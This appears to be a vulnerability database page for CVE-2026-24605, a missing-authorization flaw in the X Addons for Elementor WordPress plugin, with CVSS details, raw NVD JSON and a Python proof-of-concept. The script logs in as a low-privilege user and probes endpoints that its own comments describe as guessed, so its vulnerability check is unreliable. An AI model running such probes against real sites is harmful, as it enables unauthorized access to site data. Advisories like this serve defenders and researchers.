Security Vulnerability Report
中文
CVE-2026-24605 CVSS 4.3 MEDIUM

CVE-2026-24605

Published: 2026-01-23 15:16:19
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in pencilwp X Addons for Elementor x-addons-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects X Addons for Elementor: from n/a through <= 1.0.23.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

X Addons for Elementor <= 1.0.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24605 PoC - Missing Authorization in X Addons for Elementor # Target: WordPress site with X Addons for Elementor plugin <= 1.0.23 def check_vulnerability(target_url, username, password): """ Check if the target is vulnerable to CVE-2026-24605 """ # Setup session session = requests.Session() # WordPress login endpoint login_url = f"{target_url}/wp-login.php" # Login credentials login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } # Perform login try: response = session.post(login_url, data=login_data, timeout=10) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") return False print("[+] Login successful") # Try to access potentially vulnerable endpoints # Common X Addons for Elementor AJAX endpoints vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=x_get_settings', '/wp-admin/admin-ajax.php?action=x_addons_data', '/wp-json/x-addons/v1/settings' ] for endpoint in vulnerable_endpoints: test_url = target_url + endpoint resp = session.get(test_url, timeout=10) # Check if response indicates successful unauthorized access if resp.status_code == 200 and ('settings' in resp.text.lower() or 'data' in resp.text.lower()): print(f"[+] VULNERABLE: {endpoint}") print(f" Response preview: {resp.text[:200]}...") return True print("[-] Target may not be vulnerable or endpoints differ") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == '__main__': if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Testing CVE-2026-24605 on {target}") check_vulnerability(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24605", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:19.247", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in pencilwp X Addons for Elementor x-addons-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects X Addons for Elementor: from n/a through <= 1.0.23."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en pencilwp X Addons para Elementor x-addons-elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a X Addons para Elementor: desde n/a hasta &lt;= 1.0.23."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/x-addons-elementor/vulnerability/wordpress-x-addons-for-elementor-plugin-1-0-23-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}